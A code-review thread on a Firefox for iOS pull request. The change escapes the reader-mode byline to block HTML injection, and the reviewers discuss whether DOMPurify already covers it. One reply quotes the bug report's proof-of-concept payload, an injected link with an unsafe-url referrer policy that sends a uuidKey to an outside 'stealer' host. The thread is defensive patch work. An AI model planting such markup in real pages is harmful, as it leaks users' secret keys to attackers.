Client/Frontend/UserContent/UserScripts/MainFrame/AtDocumentStart/ReaderMode.js

```diff
@@ -79,6 +79,8 @@ function checkReadability() {
       readabilityResult.title = escapeHTML(readabilityResult.title);
       // Sanitize the credits to prevent a malicious page from inserting HTML in the `<credits>`.
       readabilityResult.credits = escapeHTML(readabilityResult.credits);
+      // Sanitize the byline to prevent a malicious page from inserting HTML in the `<byline>`.
+      readabilityResult.byline = escapeHTML(readabilityResult.byline);
```

Comment:
Since we are using DOMPurifier in https://github.com/mozilla-mobile/firefox-ios/pull/17157. I think we can safely remove the escapeHTML calls and definition since this will be handled for us by DOMPurifier. What do you think ?

Reply:
I'm not sure why, but if I don't then the bug is still reproducible from the steps listed in the Bugzilla (even using DOMPurify) 🤔 So unless I am missing something looks like we need to still do this `escapeHTML` on the `byline`

Reply:
So I just went through the payload in bugzilla. The problem in that payload is this line:

`<a href="https://csrf.jp/2023/uuidkey_stealer.php" referrerpolicy="unsafe-url">Click Me!!</a>`

The `unsafe-url` referrer policy allows to send extra information in particular `uuidKey` in this case. When using DomPurify this is stripped and all that's left is 

`<a href="https://csrf.jp/2023/uuidkey_stealer.php">Click Me!!</a>`

So while the page is still redirected to that site, nothing happens other than that. I also double checked the network request and the referrer header is not present when using DOMPurify.

### Without DOMPurify
![before](https://github.com/mozilla-mobile/firefox-ios/assets/26678795/0a8fa196-2806-4edf-a3e3-700b7dff0dc8)

### With DOMPurify
![after](https://github.com/mozilla-mobile/firefox-ios/assets/26678795/88482e28-4c13-4e72-ae1f-672b0ccd0379)

Reply:
Conversation continued on Slack

Reply:
Following our conversation in slack. This is good to go. Thanks 😄